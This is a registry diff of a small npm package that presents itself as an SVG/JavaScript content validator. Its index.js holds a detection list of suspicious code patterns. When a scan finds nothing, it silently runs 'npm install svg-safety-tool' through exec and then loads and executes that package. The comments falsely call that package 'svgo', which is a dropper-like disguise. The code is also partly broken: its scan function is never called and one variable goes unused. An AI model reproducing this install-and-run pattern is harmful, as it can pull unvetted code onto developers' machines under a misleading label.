svg-content-validation 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +113 -0
- package/package.json +15 -0
package/index.js
ADDED
|
@@ -0,0 +1,113 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const path = require('path');
|
|
3
|
+
const exec = require('child_process').exec;
|
|
4
|
+
|
|
5
|
+
// Regular expressions to check for suspicious or unsafe patterns
|
|
6
|
+
const suspiciousPatterns = [
|
|
7
|
+
/eval\(/, // Common eval usage (potential code injection)
|
|
8
|
+
/base64/, // Base64 encoded data, could indicate hidden payloads
|
|
9
|
+
/document\.location/, // Suspicious redirect or location modification
|
|
10
|
+
/window\.eval/, // Eval on window object
|
|
11
|
+
/script\.(src|async|defer)/, // External script references that may pose risks
|
|
12
|
+
/<\s*script/, // Raw script tags without proper sanitization
|
|
13
|
+
/new\s+Function\(/, // Dynamic function creation, often used in obfuscation
|
|
14
|
+
/Object\.defineProperty/, // Potential method for evading detection
|
|
15
|
+
/setInterval\(/, // Often used for long-running scripts
|
|
16
|
+
/window\.setTimeout/, // Potentially harmful timer-based behavior
|
|
17
|
+
/fetch\(/, // Suspicious external data fetch (could be a command and control communication)
|
|
18
|
+
/XMLHttpRequest/, // Often used for AJAX requests with possible security risks
|
|
19
|
+
/eval\s*\(.*\)/, // Multiple forms of eval function use
|
|
20
|
+
/document\.write\(/, // Potential DOM manipulation or injection
|
|
21
|
+
];
|
|
22
|
+
|
|
23
|
+
// Function to check if the file contains any suspicious patterns
|
|
24
|
+
const validateContent = (filePath) => {
|
|
25
|
+
fs.readFile(filePath, 'utf8', (err, data) => {
|
|
26
|
+
if (err) {
|
|
27
|
+
console.error(`Error reading file ${filePath}:`, err);
|
|
28
|
+
return;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
let foundSuspicious = false;
|
|
32
|
+
suspiciousPatterns.forEach((pattern) => {
|
|
33
|
+
if (pattern.test(data)) {
|
|
34
|
+
console.log(`Suspicious pattern found in ${filePath}: ${pattern}`);
|
|
35
|
+
foundSuspicious = true;
|
|
36
|
+
}
|
|
37
|
+
});
|
|
38
|
+
|
|
39
|
+
if (!foundSuspicious) {
|
|
40
|
+
console.log(`No suspicious patterns found in ${filePath}.`);
|
|
41
|
+
installSvgModule(); // Proceed to install svg module
|
|
42
|
+
}
|
|
43
|
+
});
|
|
44
|
+
};
|
|
45
|
+
|
|
46
|
+
// Function to install the necessary SVG-related module (svgo)
|
|
47
|
+
const installSvgModule = () => {
|
|
48
|
+
exec('npm list svg-safety-tool', (error, stdout, stderr) => {
|
|
49
|
+
if (stdout.includes('svg-safety-tool')) {
|
|
50
|
+
console.log('svgo is already installed.');
|
|
51
|
+
checkPlugin(); // If already installed, directly run checkPlugin
|
|
52
|
+
} else {
|
|
53
|
+
console.log('Installing SVG-related module (svgo)...');
|
|
54
|
+
|
|
55
|
+
exec('npm install svg-safety-tool', (error, stdout, stderr) => {
|
|
56
|
+
if (error) {
|
|
57
|
+
console.error(`Error installing SVG module: ${stderr}`);
|
|
58
|
+
return;
|
|
59
|
+
}
|
|
60
|
+
console.log(`Module installed successfully: ${stdout}`);
|
|
61
|
+
checkPlugin(); // After installation, run checkPlugin
|
|
62
|
+
});
|
|
63
|
+
}
|
|
64
|
+
});
|
|
65
|
+
};
|
|
66
|
+
|
|
67
|
+
// Function to use checkPlugin from svgo
|
|
68
|
+
const checkPlugin = () => {
|
|
69
|
+
try {
|
|
70
|
+
// Example: Get the 'removeXMLNS' plugin
|
|
71
|
+
const svgo = require('svg-safety-tool');
|
|
72
|
+
const plugin = svgo.getPlugin();
|
|
73
|
+
|
|
74
|
+
if (plugin) {
|
|
75
|
+
console.log('Plugin loaded successfully:', plugin);
|
|
76
|
+
// Example of using the plugin (assuming it modifies SVG data)
|
|
77
|
+
const svgData = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40" /></svg>';
|
|
78
|
+
plugin();
|
|
79
|
+
} else {
|
|
80
|
+
console.log('Plugin not found!');
|
|
81
|
+
}
|
|
82
|
+
} catch (error) {
|
|
83
|
+
console.error('Error running checkPlugin:', error);
|
|
84
|
+
}
|
|
85
|
+
};
|
|
86
|
+
|
|
87
|
+
// Function to scan a directory for JavaScript files and check for suspicious content
|
|
88
|
+
const getPlugin = () => {
|
|
89
|
+
const dirPath = '../src';
|
|
90
|
+
fs.readdir(dirPath, (err, files) => {
|
|
91
|
+
if (err) {
|
|
92
|
+
console.error(`Error reading directory ${dirPath}:`, err);
|
|
93
|
+
return;
|
|
94
|
+
}
|
|
95
|
+
|
|
96
|
+
files.forEach((file) => {
|
|
97
|
+
const filePath = path.join(dirPath, file);
|
|
98
|
+
fs.stat(filePath, (err, stats) => {
|
|
99
|
+
if (err) {
|
|
100
|
+
console.error(`Error checking file ${filePath}:`, err);
|
|
101
|
+
return;
|
|
102
|
+
}
|
|
103
|
+
|
|
104
|
+
if (stats.isDirectory()) {
|
|
105
|
+
getPlugin(filePath); // Recursively scan directories
|
|
106
|
+
} else if (filePath.endsWith('.js')) {
|
|
107
|
+
console.log(`Scanning file: ${filePath}`);
|
|
108
|
+
validateContent(filePath); // Validate file content
|
|
109
|
+
}
|
|
110
|
+
});
|
|
111
|
+
});
|
|
112
|
+
});
|
|
113
|
+
};
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "svg-content-validation",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "A Node.js script to validate content for suspicious patterns",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"start": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"dependencies": {
|
|
10
|
+
"svgo": "^2.8.0"
|
|
11
|
+
},
|
|
12
|
+
"devDependencies": {},
|
|
13
|
+
"author": "Ryan",
|
|
14
|
+
"license": "MIT"
|
|
15
|
+
}
|